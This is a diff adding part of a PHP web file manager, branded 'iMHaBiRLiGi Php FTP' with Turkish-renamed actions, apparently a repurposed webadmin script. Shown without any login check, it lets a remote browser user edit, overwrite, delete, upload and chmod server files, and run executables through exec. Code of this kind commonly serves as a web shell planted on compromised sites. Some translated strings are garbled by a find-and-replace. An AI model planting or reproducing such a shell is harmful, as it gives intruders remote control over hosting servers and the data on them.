+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @Kopyala($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('Kopyala_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Kopyala') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('Yol') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Düzenle':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_Düzenleed', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="Görevler">' . word('Görevler') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="Görevler">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'Sil';
+			$actions[] = 'Degistir';
+			$actions[] = 'Tasi';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'Kopyala';
+			$actions[] = 'indir';
+			if ($file['is_writable']) $actions[] = 'Düzenle';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'Sil';
+		$actions[] = 'Tasi';
+	}
+	$actions[] = 'Kopyala';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function Düzenle ($file) {
+	global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="Düzenle" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $charset;
+	return htmlentities($string, ENT_COMPAT, $charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Größe',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'Görevler' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausführen',
+
+'create_symlink' => 'Symlink erstellen',
+'Sil' => 'löschen',
+'Degistir' => 'umbenennen',
+'Tasi' => 'verschieben',
+'Kopyala' => 'kopieren',
+'Düzenle' => 'Düzenleieren',
+'indir' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zurücksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'Geri' => 'zurück',
+'Yol' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzufügen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
+'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
+'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
+'Degistir_file' => 'Benenne Datei um:',
+'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'Tasi_files' => 'Verschieben folgende Dateien:',
+'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'Kopyala_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte für "[%1]":',
+'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Répertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propriétaire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'Görevler' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Exécuter',
+
+'create_symlink' => 'Créer lien symbolique',
+'Sil' => 'Effacer',
+'Degistir' => 'Renommer',
+'Tasi' => 'Déplacer',
+'Kopyala' => 'Copier',
+'Düzenle' => 'Ouvrir',
+'indir' => 'Télécharger sur PC',
+'upload' => 'Télécharger sur serveur',
+'create' => 'Créer',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Exécuter',
+'reset' => 'Réinitialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'Geri' => 'Retour',
+'Yol' => 'Yol',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
+'already_exists' => '"[%1]" existe déjà.',
+'created' => '"[%1]" a été créé.',
+'not_created' => '"[%1]" n a pas pu être créé.',
+'really_Sil' => 'Effacer le fichier?',
